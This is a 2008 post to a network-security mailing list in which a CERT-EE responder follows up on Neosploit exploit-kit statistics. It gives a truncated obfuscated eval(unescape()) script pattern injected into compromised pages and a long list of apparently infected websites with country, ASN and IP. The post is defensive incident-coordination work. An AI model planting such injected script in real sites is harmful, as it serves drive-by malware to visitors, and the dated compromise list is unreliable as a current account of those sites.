[nsp-sec] neosploit server

Hillar Aarelaid hillar.aarelaid at cert.ee
Fri Mar 14 16:04:05 EDT 2008 

On Fri, Mar 14, 2008 at 05:06:33PM +0100, Tom Fischer wrote:
> Excerpt of the exploit (referer) statistic (that means probably 
> compromised web sites). 
> This neosploit statistic is based on data between 2008-03-06 
> and 2008-03-14:
> 
> Traffic  	Loads  	Referer
> 
> 23235	1696 (7.299%)	hxxp://www.dizionario-italiano.it/
...
> 113	3 (2.654%)	hxxp://www.giochisport.com/index.htm
> [...]
> 

Sorry, that it is Friday, but: 
<script language="javascript">$="%63e..;";eval(unescape($));document.write($);</script>
waits for cleaning

CZ | 29134 | 217.31.49.32 | www.gazzasport.cz
CZ | 6706 | 195.122.194.232 | last-fm.wz.cz
DE | 24900 | 80.190.240.43 | www.sarahbigbutt.de
DE | 28753 | 89.149.202.90 | gallery.ashlee-star.com
DE | 28753 | 89.149.202.90 | www.gallery.ashlee-star.com
DE | 8972 | 80.86.84.65 | doda.net.pl
DE | 8972 | 80.86.84.65 | www.doda.net.pl
DK | 16245 | 195.47.247.61 | www.innebandynytt.se
EU | 12594 | 193.202.89.235 | gta4sanandreas.uw.hu
HK | 17444 | 203.98.164.248 | www.happypylones.com
HU | 34655 | 80.77.113.72 | ezerporno.extra.hu
HU | 34655 | 80.77.113.72 | szexjatekok.extra.hu
HU | 34655 | 80.77.113.72 | www.ezerporno.extra.hu
HU | 8358 | 195.70.38.149 | kimaradas.hu
HU | 8358 | 195.70.38.149 | www.extazis.com
HU | 8358 | 195.70.38.149 | www.kimaradas.hu
IT | 31034 | 62.149.130.102 | www.panoz.it
IT | 31034 | 62.149.130.105 | www.nontipago.it
IT | 31034 | 62.149.130.105 | www.spiceheart.com
IT | 31034 | 62.149.130.107 | www.miguelboseonline.net
IT | 31034 | 62.149.130.108 | www.racingworld.it
IT | 31034 | 62.149.130.109 | www.sixxx.tv
IT | 31034 | 62.149.130.111 | www.mondobirra.org
IT | 31034 | 62.149.130.12 | www.harrrdito.it
IT | 31034 | 62.149.130.125 | www.fantasticokaka.it
IT | 31034 | 62.149.130.127 | www.gundamwingzero.com
IT | 31034 | 62.149.130.127 | www.hokutonoken.it
IT | 31034 | 62.149.130.127 | www.jorgetomas.net
IT | 31034 | 62.149.130.127 | www.maema-viaggi.it
IT | 31034 | 62.149.130.128 | www.schwarzenegger.it
IT | 31034 | 62.149.130.128 | www.sensazioniforti.com
IT | 31034 | 62.149.130.129 | www.cucinaconme.it
IT | 31034 | 62.149.130.130 | www.duranitaly.com
IT | 31034 | 62.149.130.131 | www.simpsonet.com
IT | 31034 | 62.149.130.132 | www.calcioa5live.com
IT | 31034 | 62.149.130.134 | www.pyotty.com
IT | 31034 | 62.149.130.136 | www.bleachsp.com
IT | 31034 | 62.149.130.137 | www.sciax2.it
IT | 31034 | 62.149.130.139 | www.acienciasgalilei.com
IT | 31034 | 62.149.130.14 | www.tuttotesti.com
IT | 31034 | 62.149.130.142 | www.fantawrestling.com
IT | 31034 | 62.149.130.142 | www.hiumi.it
IT | 31034 | 62.149.130.143 | www.mbutozone.it
IT | 31034 | 62.149.130.143 | www.zeromania.com
IT | 31034 | 62.149.130.150 | www.indicedejuegos.com
IT | 31034 | 62.149.130.152 | www.boorp.com
IT | 31034 | 62.149.130.152 | www.sailormoon.it
IT | 31034 | 62.149.130.153 | www.ginevra2000.it
IT | 31034 | 62.149.130.153 | www.lamansardadimiele.org
IT | 31034 | 62.149.130.153 | www.panebianco3d.com
IT | 31034 | 62.149.130.153 | www.queenmadonna.com
IT | 31034 | 62.149.130.154 | www.enterteinment.org
IT | 31034 | 62.149.130.17 | www.elisafunclub.it
IT | 31034 | 62.149.130.173 | www.puntinipuntini.biz
IT | 31034 | 62.149.130.174 | www.moldrek.com
IT | 31034 | 62.149.130.177 | www.jessicadoll.net
IT | 31034 | 62.149.130.18 | www.conversioni.it
IT | 31034 | 62.149.130.184 | www.ipadovani.it
IT | 31034 | 62.149.130.184 | www.psp3.org
IT | 31034 | 62.149.130.185 | www.astirugby.it
IT | 31034 | 62.149.130.185 | www.johnfrusciante.it
IT | 31034 | 62.149.130.187 | www.serialit.com
IT | 31034 | 62.149.130.19 | www.estrazionedellotto.com
IT | 31034 | 62.149.130.19 | www.estrazionelotto.com
IT | 31034 | 62.149.130.192 | www.militari.info
IT | 31034 | 62.149.130.193 | www.meteotriveneto.it
IT | 31034 | 62.149.130.20 | www.celinemaniacs.com
IT | 31034 | 62.149.130.20 | www.otakuland.it
IT | 31034 | 62.149.130.20 | www.simonerossi.it
IT | 31034 | 62.149.130.206 | www.celebsun.com
IT | 31034 | 62.149.130.209 | www.nudecelebritypics.org
IT | 31034 | 62.149.130.209 | www.pianetazzurro.it
IT | 31034 | 62.149.130.21 | win.coverisland.net
IT | 31034 | 62.149.130.21 | www.coverisland.net
IT | 31034 | 62.149.130.214 | www.kolka.net
IT | 31034 | 62.149.130.220 | www.freemasons-freemasonry.com
IT | 31034 | 62.149.130.224 | www.planetrecords.biz
IT | 31034 | 62.149.130.23 | www.eminemitalia.it
IT | 31034 | 62.149.130.234 | www.bsworld.com
IT | 31034 | 62.149.130.234 | www.ilbazardimari.net
IT | 31034 | 62.149.130.24 | www.buffyitalianworld.com
IT | 31034 | 62.149.130.24 | www.dragonballworld.it
IT | 31034 | 62.149.130.24 | www.gommoniegommonauti.it
IT | 31034 | 62.149.130.242 | www.imperatorevideos.com
IT | 31034 | 62.149.130.243 | www.mychemicalitalia.com
IT | 31034 | 62.149.130.244 | www.namysdreams.com
IT | 31034 | 62.149.130.248 | www.giorgiafans.it
IT | 31034 | 62.149.130.25 | www.hotsex2003.com
IT | 31034 | 62.149.130.25 | www.somethingtoremember.com
IT | 31034 | 62.149.130.253 | www.fansclubpablo.it
IT | 31034 | 62.149.130.253 | www.lazonas.net
IT | 31034 | 62.149.130.254 | www.marheavenj.net
IT | 31034 | 62.149.130.29 | www.sologratis.it
IT | 31034 | 62.149.130.30 | www.italiaerotika.com
IT | 31034 | 62.149.130.31 | www.giorgiacosplay.com
IT | 31034 | 62.149.130.33 | www.molecularlab.it
IT | 31034 | 62.149.130.35 | www.scaricone.it
IT | 31034 | 62.149.130.37 | www.dojinshi.biz
IT | 31034 | 62.149.130.37 | www.finalsayan.com
IT | 31034 | 62.149.130.37 | www.sfondilandia.it
IT | 31034 | 62.149.130.37 | www.stseiya.com
IT | 31034 | 62.149.130.41 | www.storminheaven.net
IT | 31034 | 62.149.130.42 | www.sfondideldesktop.com
IT | 31034 | 62.149.130.43 | www.drzap.it
IT | 31034 | 62.149.130.45 | www.bibliotecapleyades.net
IT | 31034 | 62.149.130.45 | www.ccsg.it
IT | 31034 | 62.149.130.50 | www.carogne.com
IT | 31034 | 62.149.130.50 | www.corederoma.net
IT | 31034 | 62.149.130.50 | www.saint-seiya.it
IT | 31034 | 62.149.130.51 | www.rosannalambertucci.com
IT | 31034 | 62.149.130.51 | www.sportmedicina.com
IT | 31034 | 62.149.130.53 | www.bleachrevolution.net
IT | 31034 | 62.149.130.54 | www.rectv.org
IT | 31034 | 62.149.130.55 | www.adcitalia.it
IT | 31034 | 62.149.130.56 | www.hentai-lovers.net
IT | 31034 | 62.149.130.62 | www.karaoke5.com
IT | 31034 | 62.149.130.63 | www.freeuniverse.it
IT | 31034 | 62.149.130.70 | www.freetop100.it
IT | 31034 | 62.149.130.72 | www.morpheusweb.it
IT | 31034 | 62.149.130.73 | www.casahalliwell.it
IT | 31034 | 62.149.130.81 | www.segnalidivita.com
IT | 31034 | 62.149.130.86 | www.mermaidmelody.it
IT | 31034 | 62.149.130.89 | www.italiandreams.biz
IT | 31034 | 62.149.130.92 | www.pintaracingteam.it
IT | 31034 | 62.149.131.23 | www.lacunacoil.it
IT | 31034 | 62.149.131.254 | www.classicistranieri.com
IT | 31034 | 62.149.131.254 | www.evanescencewebsite.com
IT | 31034 | 62.149.131.254 | www.streamingcalcio.com
IT | 31034 | 62.149.131.43 | www.filippofansclub.com
IT | 31034 | 62.149.140.12 | www.forumartimarziali.com
IT | 31034 | 62.149.140.12 | www.futurimedici.com
IT | 31034 | 62.149.140.13 | www.gensomadensaiyuki.net
IT | 31034 | 62.149.140.14 | www.colombiaessexo.com
IT | 31034 | 62.149.140.14 | www.hentaiforum.info
IT | 31034 | 62.149.140.14 | www.icavalieridellozodiaco.it
IT | 31034 | 62.149.140.15 | www.dizionario-italiano.it
IT | 31034 | 62.149.140.15 | www.j-pop.it
IT | 31034 | 62.149.140.18 | www.ibelieveinadv.com
IT | 31034 | 62.149.140.18 | www.peaso.com
IT | 31034 | 62.149.140.20 | www.hellodir.com
IT | 31034 | 62.149.140.20 | www.portkey.it
IT | 31034 | 62.149.140.22 | www.sweetkisses.net
IT | 31034 | 62.149.140.23 | www.narutofansubber.it
IT | 31034 | 62.149.140.24 | www.centerfolds.it
IT | 31034 | 62.149.140.25 | www.oratorioghedi.it
IT | 31034 | 62.149.140.27 | www.narutoplanet.it
IT | 31034 | 62.149.140.29 | www.lucazappa.com
IT | 31034 | 62.149.140.29 | www.mh4fun.com
IT | 31034 | 62.149.140.30 | www.celebrityforum.tv
IT | 31034 | 62.149.140.31 | www.dancetonight.it
IT | 31034 | 62.149.140.31 | www.sanbaldo.com
IT | 31034 | 62.149.140.32 | www.carnevalari.it
IT | 31034 | 62.149.140.34 | www.sinlamula.com
IT | 31034 | 62.149.140.35 | www.oasisitalia.it
IT | 31034 | 62.149.140.35 | www.rinoadiary.it
IT | 31034 | 62.149.140.36 | www.girodivite.it
IT | 31034 | 62.149.140.37 | www.dominicanhiphop.com
IT | 31034 | 62.149.140.38 | www.blceleb.com
IT | 31034 | 62.149.140.38 | www.dnrevolution.net
IT | 31034 | 62.149.140.38 | www.freshcut.it
IT | 31034 | 62.149.140.38 | www.mangas.it
IT | 31034 | 62.149.140.38 | www.spulp.com
IT | 31034 | 62.149.140.39 | www.romanaderoma.com
IT | 31034 | 62.149.140.40 | www.gundamuniverse.it
IT | 31034 | 62.149.140.41 | www.drownedmadonna.com
IT | 31034 | 62.149.140.41 | www.liceobagatta.it
IT | 31034 | 62.149.140.42 | www.equilibriarte.org
IT | 31034 | 62.149.140.42 | www.pizero.net
IT | 31034 | 62.149.140.44 | www.p2psicuro.it
IT | 31034 | 62.149.140.45 | www.charizardpage.com
IT | 31034 | 62.149.140.45 | www.klaimsoft.com
IT | 31034 | 62.149.140.46 | www.marketingroutes.com
IT | 31034 | 62.149.140.48 | www.hentaishare.com
IT | 31034 | 62.149.140.48 | www.ilnottambulo.it
IT | 31034 | 62.149.140.50 | www.claur.org
IT | 31034 | 62.149.140.50 | www.jollyblue.it
IT | 31034 | 62.149.140.51 | www.ciaocrossclub.it
IT | 31034 | 62.149.140.51 | www.simbike.it
IT | 31034 | 62.149.140.52 | www.filesharing-italia.com
IT | 31034 | 62.149.140.52 | www.madonnafanzine.com
IT | 31034 | 62.149.140.52 | www.onepiecefantasy.it
IT | 31034 | 62.149.140.54 | www.narutolegend.it
IT | 31034 | 62.149.140.54 | www.siatec.net
IT | 31034 | 62.149.140.58 | www.subir-fotos.com
IT | 31034 | 62.149.140.59 | www.celebclub.biz
IT | 31034 | 62.149.140.59 | www.punkwave.it
IT | 31034 | 62.149.140.60 | www.fmaplanet.com
IT | 31034 | 62.149.140.60 | www.manticorefeet.it
IT | 31034 | 62.149.140.61 | www.giochisport.com
IT | 31034 | 62.149.140.62 | www.vayachorrada.com
IT | 31034 | 62.149.140.63 | www.allaboutnaruto.com
IT | 31034 | 62.149.140.63 | www.gay-forum.it
IT | 31034 | 62.149.140.64 | www.lacompagniadelcavatappi.it
IT | 31034 | 62.149.140.64 | www.televysion.com
IT | 31034 | 62.149.140.65 | www.crossed-destinies.net
IT | 31034 | 62.149.140.65 | www.frozendale.com
IT | 31034 | 62.149.140.67 | www.babinokia.com
IT | 31034 | 62.149.140.68 | www.spaziocellulare.com
IT | 31034 | 62.149.140.69 | www.minimotorevolution.com
IT | 31034 | 62.149.140.70 | www.esdeperu.com
IT | 31034 | 62.149.140.72 | www.bonjovitalia.com
IT | 31034 | 62.149.140.72 | www.hypersg1.org
IT | 31034 | 62.149.140.73 | www.alltollz.org
IT | 31034 | 62.149.140.74 | www.dragonstars.it
IT | 31034 | 62.149.140.74 | www.mapelli.info
IT | 31034 | 62.149.140.76 | www.eurohackers.it
IT | 31034 | 62.149.140.80 | www.newpilates.it
IT | 31034 | 62.149.140.81 | www.flowersofhentai.org
IT | 31034 | 62.149.140.82 | www.pulpweb.it
IT | 31034 | 62.149.140.84 | www.mugenation.com
IT | 31034 | 62.149.140.86 | www.calcioita.com
IT | 31034 | 62.149.140.86 | www.ilmondodilaura.com
IT | 31034 | 62.149.140.88 | www.descargas-directas.net
IT | 31034 | 62.149.140.88 | www.kabatology.com
IT | 31034 | 62.149.140.88 | www.youhentai.net
IT | 31034 | 62.149.140.90 | www.onlinerihanna.com
IT | 31034 | 62.149.140.90 | www.sitopornogratuito.com
IT | 31034 | 62.149.140.90 | www.techgsmnet.com
IT | 31034 | 62.149.140.91 | www.copertinedvd.net
IT | 35612 | 81.174.59.139 | www.castaldilluminazione.com
NL | 12902 | 217.77.129.110 | www.knibbelermeubelen.nl
NL | 35415 | 88.85.84.37 | www.eroticpornart.com
NL | 41785 | 91.142.242.85 | www.masterwanker.com
PL | 12824 | 89.161.179.228 | www.mammarzenie.org
PL | 15967 | 85.128.206.27 | acmilan.com.pl
PL | 15967 | 85.128.206.27 | www.acmilan.com.pl
PL | 29522 | 195.149.226.150 | www.poznajchorwacje.pl
PL | 29522 | 195.149.227.251 | www.soccer.com.pl
PL | 6714 | 89.174.255.24 | www.ilustris.pl
SK | 6855 | 213.81.152.61 | www.escar.sk
UA | 35415 | 194.187.99.1 | www.perfectgirls.net
UA | 35415 | 194.187.99.107 | www.sexymaturethumbs.com
US | 14501 | 66.221.203.241 | www.bouti.net
US | 21788 | 66.96.238.117 | www.bigbubblingbuttclub.com
US | 21844 | 67.18.148.146 | www.teens-kissing.com
US | 21844 | 74.54.143.210 | www.sms2impress.com
US | 21844 | 74.54.143.210 | www.urduinn.com
US | 22384 | 66.115.174.83 | www.moviezentral.com
US | 22384 | 66.115.174.87 | www.annakova.com
US | 22653 | 66.154.58.5 | www.tgplivesex.com
US | 22781 | 216.131.78.161 | www.lvpanty.com
US | 23393 | 66.230.182.150 | www.browncuties.com
US | 23393 | 66.230.187.35 | www.barbarianmovies.com
US | 23393 | 66.230.187.43 | www.psychoclips.com
US | 25653 | 65.98.53.239 | www.bbqpits.com
US | 27257 | 209.200.33.132 | justassmovies.com
US | 27257 | 209.200.33.132 | www.justassmovies.com
US | 30266 | 216.17.108.28 | www.drunknudegirls.com
US | 30315 | 67.15.78.37 | www.2busty.net
US | 30506 | 66.249.137.125 | www.jennysnylons.com
US | 31815 | 64.13.232.161 | www.mcvideogame.com
US | 3491 | 205.252.250.34 | voyeur-place.net
US | 3491 | 205.252.250.34 | www.voyeur-place.net
US | 8001 | 216.118.102.103 | chloecreations.com
US | 8001 | 216.118.102.103 | www.chloecreations.com
US | 8001 | 216.118.102.103 | www.crushbabes.com
| | 17014 | 66.96.133.9 | piratamundo.com
| | 17014 | 66.96.133.9 | www.piratamundo.com

Hillar
CERT-EE

More information about the nsp-security mailing list